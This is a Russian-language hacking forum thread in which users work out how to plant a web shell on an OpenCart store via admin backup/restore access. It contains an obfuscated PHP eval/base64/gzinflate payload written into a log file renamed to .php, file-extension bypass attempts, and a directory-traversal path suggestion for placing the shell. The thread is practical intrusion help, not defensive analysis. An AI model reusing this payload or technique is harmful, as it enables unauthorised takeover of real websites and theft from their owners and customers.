Вопрос про Opencart и Magento

Discussion in 'Песочница' started by polzunki, 3 Feb 2021.

  1. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Доброго времени
    Подскажите по нескольким вопросам
    1. Где в бд Magento находится полный адрес сайта?
    2. Есть ли варианты, и если есть, просьба подсказать какие, по заливке шелла в Opencart.
    Что пробовал:
    Заливать различные расширения. Такие как: .php .php1 .php2 .php3 и т.д
    Так же .php.gif .php.jpg
    .htaccess залить не даёт.
    Есть доступ к заливщику картинок (В него и пробовал заливать все вышеуказанные разрешения файлов). И к функциям backup/restore.
    Но после импорта .sql не могу найти путь до аплоадера.
     
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    632
    Likes Received:
    1,315
    Reputations:
    408
    Не эксперт по магенте, но в интерентах пишут, что лежит в таблице core_config_data.

    По опенкарту точно не подскажу, но интересно, что значит "найти путь до аплоадера"? :)
     
  3. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Об этом я тоже читал, но именно адреса сайта в таблице нет. Есть только пути.

    Вот так будет нагляднее) Видео в конце.

    Меняю расширение файла лога на .php
    Импортирую в бд:
    Code:
    SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
    /iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
    DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
    sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM mouwaffek_table
    Дальше нужно узнать по какому пути находится лог файл. На видео ниже это продемонстрировано. У меня проблема после импорта найти этот файл.

     
  4. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    632
    Likes Received:
    1,315
    Reputations:
    408
    Может прав не хватает, поэтому файл не создается или в конкретной версии опенкарта другой путь по которому пишется лог. Как вариант, попробовать обход каталога, забить путь типа /../../../../../../../../../../../../../var/www/html/uploads/my.php. Где uploads, директория с доступными правами на запись.
     
    #4 crlf, 5 Feb 2021
    Last edited: 5 Feb 2021
    fandor9 likes this.
  5. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    606
    Likes Received:
    1,021
    Reputations:
    46
    Имя логов сохраняется в таблице config в config_error_filename. Настройки папки логов (DIR_LOGS) лежат в admin/config.php . Кстати в новых версиях стоит проверка что название файла должно оканчиваться на .log и не содержит "../"
     
    crlf likes this.
Loading...